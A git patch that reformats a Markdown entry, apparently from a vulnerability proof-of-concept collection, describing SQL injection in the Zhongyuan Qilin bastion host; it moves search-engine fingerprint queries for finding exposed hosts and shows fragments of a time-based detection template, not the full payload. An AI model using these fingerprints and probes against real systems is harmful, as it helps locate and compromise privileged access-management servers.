From 8bcc63e2423ad191ef78cfc011f94e056eed6d2c Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 14 Sep 2023 17:51:04 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E4=B8=AD=E8=BF=9C=E9=BA=92=E9=BA=9F?=
 =?UTF-8?q?=E5=A0=A1=E5=9E=92=E6=9C=BASQL=E6=B3=A8=E5=85=A5.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 中远麒麟堡垒机SQL注入.md | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/中远麒麟堡垒机SQL注入.md b/中远麒麟堡垒机SQL注入.md
index fd457ee..73f23a5 100644
--- a/中远麒麟堡垒机SQL注入.md
+++ b/中远麒麟堡垒机SQL注入.md
@@ -1,8 +1,11 @@
 ## 中远麒麟堡垒机SQL注入
 麒麟堡垒机用于运维管理的认证、授权、审计等监控管理。中远麒麟堡垒机存在SQL注入，可利用该漏洞获取系统敏感信息。
-检索条件:
-cert="Baolei"||title="麒麟堡垒机"||body="admin.php?controller=admin_index&action=get_user_login_fristauth"||body="admin.php?controller=admin_index&action=login"
 
+
+检索条件：
+cert="Baolei" 或 title="麒麟堡垒机" 或 body="admin.php?controller=admin_index&action=get_user_login_fristauth" 
+
+或 body="admin.php?controller=admin_index&action=login"
 ```
 poc:
   relative: req0 && req1
@@ -30,8 +33,7 @@ poc:
     matches: time.lt("5")
 
 ```
-检索条件：
-cert="Baolei" 或 title="麒麟堡垒机" 或 body="admin.php?controller=admin_index&action=get_user_login_fristauth" 或 body="admin.php?controller=admin_index&action=login"
+
 
 ## 请求包
 ```